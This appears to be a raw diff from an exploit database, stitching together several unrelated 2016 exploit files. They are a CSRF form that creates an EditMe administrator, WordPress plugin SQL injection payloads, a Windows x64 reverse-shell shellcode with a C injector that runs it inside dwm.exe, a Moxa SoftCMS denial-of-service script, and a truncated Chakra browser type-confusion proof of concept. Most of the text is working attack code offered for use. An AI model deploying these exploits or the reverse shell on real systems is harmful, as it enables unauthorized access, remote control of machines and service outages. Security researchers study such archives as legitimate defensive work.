2016-11-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the official EditMe content managament system.
The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions
with own web context.
In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain
unauthorized access to the administrator access privileges.
Proof of Concept (PoC):
=======================
Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction.
To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided.
--- PoC: CSRF Exploitation ---
<html>
<h2>Privilege Escalate CSRF Vulnerability</h2>
<form action="http://localhost/_Register" method="post">
<input name="mode" value="AdminAdd" type="hidden">
<input name="redirect" value="" type="hidden">
<td><select name="user-groupname">
<option value="A"selected="">Administrator</option></select></td>
<input name="user-username" value="VulnerabilityLab" type="hidden">
<input name="user-password" value="1234" type="hidden">
<input name="user-password2" value="1234" type="hidden">
<input name="user-email" value="tested@live.fr"type="hidden">
<input class="button" style="font-size:110%" name="regSubmit" value="Save" type="submit">
</form>
</html>
--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: pentest.editme.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw=="
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
-
POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr&regSubmit=Save
Security Risk:
==============
The security rsik of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8)
Credits & Authors:
==================
ZwX - (http://zwx.fr/) )[http://www.vulnerability-lab.com/show.php?user=ZwX]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

27
platforms/php/webapps/40782.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/
# Software Link: https://wordpress.org/plugins/bbs-e-franchise/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.1.1
# Tested on: Windows 8.1
1 - Description:
$_GET[uid] is not escaped. Url is accessible for any user.
I will have find post or page that usage plugin, that use shortcode
http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/
2 - Proof of Concept:
http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found

35
platforms/php/webapps/40783.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Product Catalog 8 1.2 Plugin WordPress Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/product-catalog-8/
# Software Link: https://wordpress.org/plugins/product-catalog-8/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.2
# Tested on: Windows 8.1
1 - Description:
$_POST[ selectedCategory ] is not escaped.
UpdateCategoryList() is accessible for any user.
http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/
2 - Proof of Concept:
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
--
Atenciosamente
Lenon Leite

View file

@ -0,0 +1,658 @@
/*
# Title : Windows x64 Reverse Shell TCP shellcode
# size : 694 bytes
# Author: Roziul Hasan Khan Shifat
# Date : 10-11-2016
# Tested on : Windows 7 x64 Professional
# Email : shifath12@gmail.com
*/
/*
Disassembly of section .text:
0000000000000000 <s>:
0: 48 31 d2 xor %rdx,%rdx
3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
8: 48 8b 70 18 mov 0x18(%rax),%rsi
c: 48 8b 76 10 mov 0x10(%rsi),%rsi
10: 48 ad lods %ds:(%rsi),%rax
12: 48 8b 30 mov (%rax),%rsi
15: 48 8b 7e 30 mov 0x30(%rsi),%rdi
19: b2 88 mov $0x88,%dl
1b: 8b 5f 3c mov 0x3c(%rdi),%ebx
1e: 48 01 fb add %rdi,%rbx
21: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
24: 48 01 fb add %rdi,%rbx
27: 44 8b 73 1c mov 0x1c(%rbx),%r14d
2b: 49 01 fe add %rdi,%r14
2e: 66 ba fc 0c mov $0xcfc,%dx
32: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
36: 48 01 fb add %rdi,%rbx
39: 48 31 d2 xor %rdx,%rdx
3c: 52 push %rdx
3d: 52 push %rdx
3e: c7 04 24 77 73 32 5f movl $0x5f327377,(%rsp)
45: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp)
4c: 64
4d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
54: 48 8d 0c 24 lea (%rsp),%rcx
58: 48 83 ec 58 sub $0x58,%rsp
5c: ff d3 callq *%rbx
5e: 48 83 c4 68 add $0x68,%rsp
62: 48 89 c6 mov %rax,%rsi
65: 48 31 db xor %rbx,%rbx
68: 48 31 d2 xor %rdx,%rdx
6b: b2 88 mov $0x88,%dl
6d: 8b 5e 3c mov 0x3c(%rsi),%ebx
70: 48 01 f3 add %rsi,%rbx
73: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
76: 48 01 f3 add %rsi,%rbx
79: 44 8b 7b 1c mov 0x1c(%rbx),%r15d
7d: 49 01 f7 add %rsi,%r15
80: 48 31 d2 xor %rdx,%rdx
83: 66 ba c8 01 mov $0x1c8,%dx
87: 41 8b 1c 17 mov (%r15,%rdx,1),%ebx
8b: 48 01 f3 add %rsi,%rbx
8e: 66 ba 98 01 mov $0x198,%dx
92: 48 29 d4 sub %rdx,%rsp
95: 48 8d 14 24 lea (%rsp),%rdx
99: 48 31 c9 xor %rcx,%rcx
9c: 66 b9 02 02 mov $0x202,%cx
a0: 48 83 ec 58 sub $0x58,%rsp
a4: ff d3 callq *%rbx
a6: 48 31 d2 xor %rdx,%rdx
a9: 48 83 ec 58 sub $0x58,%rsp
ad: 48 89 54 24 20 mov %rdx,0x20(%rsp)
b2: 48 89 54 24 28 mov %rdx,0x28(%rsp)
b7: 48 ff c2 inc %rdx
ba: 48 89 d1 mov %rdx,%rcx
bd: 48 ff c1 inc %rcx
c0: 4d 31 c0 xor %r8,%r8
c3: 49 83 c0 06 add $0x6,%r8
c7: 4d 31 c9 xor %r9,%r9
ca: 66 41 b9 88 01 mov $0x188,%r9w
cf: 43 8b 1c 0f mov (%r15,%r9,1),%ebx
d3: 48 01 f3 add %rsi,%rbx
d6: 4d 31 c9 xor %r9,%r9
d9: ff d3 callq *%rbx
db: 49 89 c5 mov %rax,%r13
de: 4d 31 c0 xor %r8,%r8
e1: 41 50 push %r8
e3: 41 50 push %r8
e5: c6 04 24 02 movb $0x2,(%rsp)
e9: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%rsp)
f0: c7 44 24 04 c0 a8 0a movl $0x800aa8c0,0x4(%rsp)
f7: 80
f8: 4c 8d 24 24 lea (%rsp),%r12
fc: 48 83 ec 58 sub $0x58,%rsp
0000000000000100 <c>:
100: 48 31 db xor %rbx,%rbx
103: 41 8b 5f 0c mov 0xc(%r15),%ebx
107: 48 01 f3 add %rsi,%rbx
10a: 4c 89 e2 mov %r12,%rdx
10d: 4c 89 e9 mov %r13,%rcx
110: 41 b0 10 mov $0x10,%r8b
113: ff d3 callq *%rbx
115: 4d 31 c0 xor %r8,%r8
118: 4c 39 c0 cmp %r8,%rax
11b: 75 e3 jne 100 <c>
11d: 48 31 db xor %rbx,%rbx
120: 41 8b 5e 40 mov 0x40(%r14),%ebx
124: 48 01 fb add %rdi,%rbx
127: ff d3 callq *%rbx
129: 48 31 d2 xor %rdx,%rdx
12c: 52 push %rdx
12d: 52 push %rdx
12e: c7 04 24 75 73 65 72 movl $0x72657375,(%rsp)
135: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp)
13c: 64
13d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp)
144: 48 8d 0c 24 lea (%rsp),%rcx
148: 66 ba fc 0c mov $0xcfc,%dx
14c: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
150: 48 01 fb add %rdi,%rbx
153: 48 83 ec 58 sub $0x58,%rsp
157: ff d3 callq *%rbx
159: 48 89 c6 mov %rax,%rsi
15c: 48 31 db xor %rbx,%rbx
15f: 48 31 d2 xor %rdx,%rdx
162: 66 ba 4a 02 mov $0x24a,%dx
166: 45 8b 24 96 mov (%r14,%rdx,4),%r12d
16a: 49 01 fc add %rdi,%r12
16d: 48 31 c9 xor %rcx,%rcx
170: 51 push %rcx
171: 51 push %rcx
172: c7 04 24 46 69 6e 64 movl $0x646e6946,(%rsp)
179: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp)
180: 64
181: c7 44 24 08 6f 77 41 movl $0x4141776f,0x8(%rsp)
188: 41
189: 80 74 24 0b 41 xorb $0x41,0xb(%rsp)
18e: 48 8d 14 24 lea (%rsp),%rdx
192: 48 89 f1 mov %rsi,%rcx
195: 48 83 ec 58 sub $0x58,%rsp
199: 41 ff d4 callq *%r12
19c: 48 31 d2 xor %rdx,%rdx
19f: 52 push %rdx
1a0: 52 push %rdx
1a1: 52 push %rdx
1a2: c7 04 24 43 6f 6e 73 movl $0x736e6f43,(%rsp)
1a9: c7 44 24 04 6f 6c 65 movl $0x57656c6f,0x4(%rsp)
1b0: 57
1b1: c7 44 24 08 69 6e 64 movl $0x6f646e69,0x8(%rsp)
1b8: 6f
1b9: c7 44 24 0c 77 43 6c movl $0x616c4377,0xc(%rsp)
1c0: 61
1c1: 66 c7 44 24 10 73 73 movw $0x7373,0x10(%rsp)
1c8: 48 8d 0c 24 lea (%rsp),%rcx
1cc: 48 83 ec 58 sub $0x58,%rsp
1d0: ff d0 callq *%rax
1d2: 49 89 c7 mov %rax,%r15
1d5: 48 31 d2 xor %rdx,%rdx
1d8: 48 31 c9 xor %rcx,%rcx
1db: 51 push %rcx
1dc: 51 push %rcx
1dd: c7 04 24 53 68 6f 77 movl $0x776f6853,(%rsp)
1e4: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp)
1eb: 64
1ec: 66 c7 44 24 08 6f 77 movw $0x776f,0x8(%rsp)
1f3: 48 8d 14 24 lea (%rsp),%rdx
1f7: 48 89 f1 mov %rsi,%rcx
1fa: 48 83 ec 58 sub $0x58,%rsp
1fe: 41 ff d4 callq *%r12
201: 4c 89 f9 mov %r15,%rcx
204: 48 31 d2 xor %rdx,%rdx
207: 48 83 ec 58 sub $0x58,%rsp
20b: ff d0 callq *%rax
20d: 66 ba 90 02 mov $0x290,%dx
211: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 83 ec 68 sub $0x68,%rsp
21c: 48 83 ec 18 sub $0x18,%rsp
220: 4c 8d 24 24 lea (%rsp),%r12
224: b2 68 mov $0x68,%dl
226: 48 31 c9 xor %rcx,%rcx
229: 41 89 14 24 mov %edx,(%r12)
22d: 49 89 4c 24 04 mov %rcx,0x4(%r12)
232: 49 89 4c 24 0c mov %rcx,0xc(%r12)
237: 49 89 4c 24 14 mov %rcx,0x14(%r12)
23c: 49 89 4c 24 18 mov %rcx,0x18(%r12)
241: 48 31 d2 xor %rdx,%rdx
244: b2 ff mov $0xff,%dl
246: 48 ff c2 inc %rdx
249: 41 89 54 24 3c mov %edx,0x3c(%r12)
24e: 4d 89 6c 24 50 mov %r13,0x50(%r12)
253: 4d 89 6c 24 58 mov %r13,0x58(%r12)
258: 4d 89 6c 24 60 mov %r13,0x60(%r12)
25d: 68 63 6d 64 41 pushq $0x41646d63
262: 88 54 24 03 mov %dl,0x3(%rsp)
266: 48 8d 14 24 lea (%rsp),%rdx
26a: 48 ff c1 inc %rcx
26d: 48 83 ec 58 sub $0x58,%rsp
271: 48 89 4c 24 20 mov %rcx,0x20(%rsp)
276: 48 31 c9 xor %rcx,%rcx
279: 4d 31 c0 xor %r8,%r8
27c: 4c 89 44 24 28 mov %r8,0x28(%rsp)
281: 4c 89 44 24 30 mov %r8,0x30(%rsp)
286: 4c 89 44 24 38 mov %r8,0x38(%rsp)
28b: 4d 8d 0c 24 lea (%r12),%r9
28f: 4c 89 4c 24 40 mov %r9,0x40(%rsp)
294: 4d 8d 4c 24 68 lea 0x68(%r12),%r9
299: 4c 89 4c 24 48 mov %r9,0x48(%rsp)
29e: 4d 31 c9 xor %r9,%r9
2a1: ff d3 callq *%rbx
2a3: 48 31 d2 xor %rdx,%rdx
2a6: 66 ba a0 04 mov $0x4a0,%dx
2aa: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx
2ae: 48 01 fb add %rdi,%rbx
2b1: 48 31 c9 xor %rcx,%rcx
2b4: ff d3 callq *%rbx
*/
/*
section .text
global s
s:
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30]
;--------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c]
add rbx,rdi
mov ebx,[rbx+rdx]
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov r14d,[rbx+0x1c]
add r14,rdi ;kernel32.dll AddressOfFunctions
;-----------------------
;loading ws2_32.dll
mov dx,831*4
mov ebx,[r14+rdx]
add rbx,rdi ;LoadLibraryA()
xor rdx,rdx
push rdx
push rdx
mov [rsp],dword 'ws2_'
mov [rsp+4],dword '32.d'
mov [rsp+8],word 'll'
lea rcx,[rsp]
sub rsp,88
call rbx
add rsp,104
mov rsi,rax ;ws2_32.dll base address
;--------------------------------------
xor rbx,rbx
xor rdx,rdx
;finding Export table of ws2_32.dll
mov dl,0x88
mov ebx,[rsi+0x3c]
add rbx,rsi
mov ebx,[rbx+rdx]
add rbx,rsi ;IMAGE_EXPORT_DIRECTORY
mov r15d,[rbx+0x1c]
add r15,rsi ;ws2_32.dll AddressOfFunctions
;--------------------------------------
;WSAStartup(514,&WSADATA)
xor rdx,rdx
mov dx,114*4
mov ebx,[r15+rdx]
add rbx,rsi ;rbx=WSAStartup()
mov dx,408
sub rsp,rdx
lea rdx,[rsp]
xor rcx,rcx
mov cx,514
sub rsp,88 ;reserving space for API call (Important)
call rbx
;-------------------------------------------------------
;WSASocketA(2,1,6,0,0,0)
xor rdx,rdx
sub rsp,88
mov [rsp+32],rdx
mov [rsp+40],rdx
inc rdx
mov rcx,rdx
inc rcx
xor r8,r8
add r8,6
xor r9,r9
mov r9w,98*4
mov ebx,[r15+r9]
add rbx,rsi ;rbx=WSASocketA()
xor r9,r9
call rbx
mov r13,rax ;r13=SOCKET
;------------------------------------------
xor r8,r8
push r8
push r8
mov [rsp],byte 2
mov [rsp+2],word 0x5c11 ;port 4444
mov [rsp+4],dword 0x800aa8c0 ;change it
lea r12,[rsp]
sub rsp,88
;-------------------------------------------
;connect(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
c:
xor rbx,rbx
mov ebx,[r15+12]
add rbx,rsi ;rbx=connect()
mov rdx,r12
mov rcx,r13
mov r8b,16
call rbx
xor r8,r8
cmp rax,r8
jnz c
;----------------------------------------------------------------------------------------
;Hiding Window
;----------------------------------------------------------------------------------------
;AllocConsole()
xor rbx,rbx
mov ebx,[r14+64]
add rbx,rdi ;rbx=AllocConsole()
call rbx
;------------------------------
;loading user32.dll
xor rdx,rdx
push rdx
push rdx
mov [rsp],dword 'user'
mov [rsp+4],dword '32.d'
mov [rsp+8],word 'll'
lea rcx,[rsp]
mov dx,831*4
mov ebx,[r14+rdx]
add rbx,rdi
sub rsp,88
call rbx
mov rsi,rax
;--------------------------------
xor rbx,rbx
xor rdx,rdx
;----------------------------------
;FindWindowA("ConsoleWindowClass",NULL)
mov dx,586
mov r12d,[r14+rdx*4]
add r12,rdi ;rbx=GetProcAddress()
xor rcx,rcx
push rcx
push rcx
mov [rsp],dword 'Find'
mov [rsp+4],dword 'Wind'
mov [rsp+8],dword 'owAA'
xor byte [rsp+11],0x41
lea rdx,[rsp]
mov rcx,rsi
sub rsp,88
call r12
;-----------------------------------
xor rdx,rdx
push rdx
push rdx
push rdx
mov [rsp],dword 'Cons'
mov [rsp+4],dword 'oleW'
mov [rsp+8],dword 'indo'
mov [rsp+12],dword 'wCla'
mov [rsp+16],word 'ss'
lea rcx,[rsp]
sub rsp,88
call rax
mov r15,rax
xor rdx,rdx
;---------------------------------------
;ShowWindow(HWND,0)
xor rcx,rcx
push rcx
push rcx
mov [rsp],dword 'Show'
mov [rsp+4],dword 'Wind'
mov [rsp+8],word 'ow'
lea rdx,[rsp]
mov rcx,rsi
sub rsp,88
call r12
mov rcx,r15
xor rdx,rdx
sub rsp,88
call rax
;-----------------------------------------------
;--------------------------------------------------------------------------------------------------------------------------------
;CreateProcessA()
mov dx,164*4
mov ebx,[r14+rdx]
add rbx,rdi
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
sub rsp,104
sub rsp,24
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r13
mov [r12+0x58],r13
mov [r12+0x60],r13
;--------------------------------------------------
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
;-------------------------------------
sub rsp,88
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx
;-------------------------------
xor rdx,rdx
mov dx,296*4
mov ebx,[r14+rdx]
add rbx,rdi
xor rcx,rcx
call rbx
*/
#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>
char shellcode[]="\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x44\x8b\x73\x1c\x49\x01\xfe\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x52\x52\xc7\x04\x24\x77\x73\x32\x5f\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x83\xc4\x68\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\xb2\x88\x8b\x5e\x3c\x48\x01\xf3\x8b\x1c\x13\x48\x01\xf3\x44\x8b\x7b\x1c\x49\x01\xf7\x48\x31\xd2\x66\xba\xc8\x01\x41\x8b\x1c\x17\x48\x01\xf3\x66\xba\x98\x01\x48\x29\xd4\x48\x8d\x14\x24\x48\x31\xc9\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x48\x83\xec\x58\x48\x89\x54\x24\x20\x48\x89\x54\x24\x28\x48\xff\xc2\x48\x89\xd1\x48\xff\xc1\x4d\x31\xc0\x49\x83\xc0\x06\x4d\x31\xc9\x66\x41\xb9\x88\x01\x43\x8b\x1c\x0f\x48\x01\xf3\x4d\x31\xc9\xff\xd3\x49\x89\xc5\x4d\x31\xc0\x41\x50\x41\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x0a\x80\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x31\xdb\x41\x8b\x5f\x0c\x48\x01\xf3\x4c\x89\xe2\x4c\x89\xe9\x41\xb0\x10\xff\xd3\x4d\x31\xc0\x4c\x39\xc0\x75\xe3\x48\x31\xdb\x41\x8b\x5e\x40\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x52\xc7\x04\x24\x75\x73\x65\x72\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x58\xff\xd3\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\x66\xba\x4a\x02\x45\x8b\x24\x96\x49\x01\xfc\x48\x31\xc9\x51\x51\xc7\x04\x24\x46\x69\x6e\x64\xc7\x44\x24\x04\x57\x69\x6e\x64\xc7\x44\x24\x08\x6f\x77\x41\x41\x80\x74\x24\x0b\x41\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x48\x31\xd2\x52\x52\x52\xc7\x04\x24\x43\x6f\x6e\x73\xc7\x44\x24\x04\x6f\x6c\x65\x57\xc7\x44\x24\x08\x69\x6e\x64\x6f\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\xc7\x44\x24\x10\x73\x73\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x49\x89\xc7\x48\x31\xd2\x48\x31\xc9\x51\x51\xc7\x04\x24\x53\x68\x6f\x77\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\xc7\x44\x24\x08\x6f\x77\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x4c\x89\xf9\x48\x31\xd2\x48\x83\xec\x58\xff\xd0\x66\xba\x90\x02\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x68\x48\x83\xec\x18\x4c\x8d\x24\x24\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\x48\x31\xd2\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x4d\x89\x6c\x24\x50\x4d\x89\x6c\x24\x58\x4d\x89\x6c\x24\x60\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x48\x8d\x14\x24\x48\xff\xc1\x48\x83\xec\x58\x48\x89\x4c\x24\x20\x48\x31\xc9\x4d\x31\xc0\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x4d\x8d\x0c\x24\x4c\x89\x4c\x24\x40\x4d\x8d\x4c\x24\x68\x4c\x89\x4c\x24\x48\x4d\x31\xc9\xff\xd3\x48\x31\xd2\x66\xba\xa0\x04\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xc9\xff\xd3";
void inject(DWORD );
int main()
{
char program_name[]="dwm.exe"; //Process name to inject. change it if U Want
BOOL f=0;
HANDLE snap;
PROCESSENTRY32 pe32;
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed."); return 0;
}
pe32.dwSize=sizeof(pe32);
if(!Process32First(snap,&pe32))
{
printf("Process32First() Failed."); return 0;
}
do
{
if(0==strncmp(program_name,pe32.szExeFile,strlen(program_name)))
{
f=TRUE;
break;
}
}while(Process32Next(snap,&pe32));
if(!f)
{
printf("No infomation found about \"%s\" ",program_name);
}
else
{
printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
printf("\nInjecting shellcode");
inject(pe32.th32ProcessID);
}
return 0;
}
void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;
phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}
shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); CloseHandle(phd); return ;
}
WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");
h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}
else
printf("shellcode Execution Successfull");
}

33
platforms/windows/dos/40779.py Executable file
View file

@ -0,0 +1,33 @@
'''
# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability
# Author: Zhou Yu
# Email: 504137480@qq.com
# Vendor: http://www.moxa.com/
# Versions affected: 1.5 or prior versions
# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32
# CVE: CVE-2016-9332
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02
Vulnerability Description:
AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.
Vulnerability Discovery Method:
With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS .
'''
import socket
host = '192.168.124.128'
port = 81
# extracted four payloads from crashes that can crash the AspWebServer.exe
payload1 = 'GET /\ HTTP/1.1\r\n\r\n'
payload2 = 'GET \x00 HTTP/1.1\r\n\r\n'
payload3 = 'GET \n HTTP/1.1\r\n\r\n'
payload4 = 'GET /. HTTP/1.1\r\n\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload1)
s.close()

View file

@ -0,0 +1,48 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=945
JavascriptArray::FillFromPrototypes is a method that is used by several Javascript functions available in the browser to set the native elements of an array to the values provide by its prototype. This function calls JavascriptArray::ForEachOwnMissingArrayIndexOfObject with the prototype of the object as a parameter, and if the prototype of the object is an array, it assumes that it is a Var array. While arrays are generally converted to var arrays if they are set as an object's prototype, if an object's prototype is a Proxy object, it can return a parent prototype that is a native int array. This can lead to type confusing, allowing an integer to be treated as an absolute pointer, when JavascriptArray::FillFromPrototypes is called. A minimal PoC is as follows, and a full PoC is attached.
var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);
var handler = {
getPrototypeOf: function(target, name){
return a;
}
};
var p = new Proxy([], handler);
var b = [{}, [], "natalie"];
b.__proto__ = p;
b.length = 4;
a.shift.call(b);
// b[2] is type confused
-->
<html>
<body>
<script>
var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);
var handler = {
getPrototypeOf: function(target, name){
// print("get proto");
return a;
}
};
var p = new Proxy([], handler);
var b = [{}, [], "natalie"];
b.__proto__ = p;
